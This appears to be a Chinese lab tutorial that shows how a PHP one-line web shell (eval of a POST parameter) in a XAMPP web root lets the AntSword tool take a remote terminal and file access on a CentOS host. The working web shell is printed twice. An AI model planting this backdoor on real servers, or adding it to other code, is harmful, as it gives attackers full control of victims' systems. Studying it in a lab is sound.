在享受互联网带来的便利的同时，也充满了各种网络安全风险，本文通过搭建实验环境，演示一句话木马获取主机权限。

演示环境

服务端：安装LAMP环境，部署web网站，上传一句话木马文件

客户端：安装AntSword（蚁剑）

环境准备

服务器准备

基本信息
操作系统：centos7
ip：192.168.21.131

网站部署：LAMP
方法一：XAMPP部署，参考--php开发环境部署（xampp）-CSDN博客
方法二：宝塔面板部署，参考--宝塔面板（服务器管理）-CSDN博客

制作一句话木马文件
文件名：ant.php
文件内容：<?php @eval($_POST['php']); ?>

客户端准备

基本信息
操作系统：windows 10
ip：192.168.21.130

安装蚁剑渗透测试工具
参考：渗透测试工具（AntSword）-CSDN博客

演示

centos7系统，采用XAMPP安装方式已部署好LAMP环境

[root@192 ~]# /opt/lampp/lampp status
Version: XAMPP for Linux 8.2.4-0
Apache is running.
MySQL is running.
ProFTPD is running.

页面访问正常

将ant.php文件上传到网站根目录
本次演示为手动将文件上传到网站根目录，也可以部署dvwa渗透测试环境，通过文件上传功能上传木马文件，本文不作演示
dvwa渗透测试环境部署参考：dvwa渗透测试环境部署-CSDN博客

[root@192 ~]# cat /opt/lampp/htdocs/ant.php 
<?php @eval($_POST['php']); ?>
[root@192 ~]# 

浏览器访问ant.php文件，状态码返回200 

客户端电脑打开“蚁剑”工具，添加数据“http://192.168.21.131/ant.php” 

在空白处右击，然后点击“添加数据”

 如下图所示，填写url地址和密码（一句话木马文件中定义的密码“php”），然后依次点击“测试连接”和“添加”

右击选中的数据，然后点击“虚拟终端”

 获取到了终端权限

 右击选中数据，点击“文件管理”

获取了文件管理权限

总结

网络安全风险无处不在，我们应当加强防护，但也不必太过担心，网络攻击成功必须天时地利人和，只要我们做好安全防护，也不会轻易被攻击。

内容导览：计算机网络基础、进阶、安全实践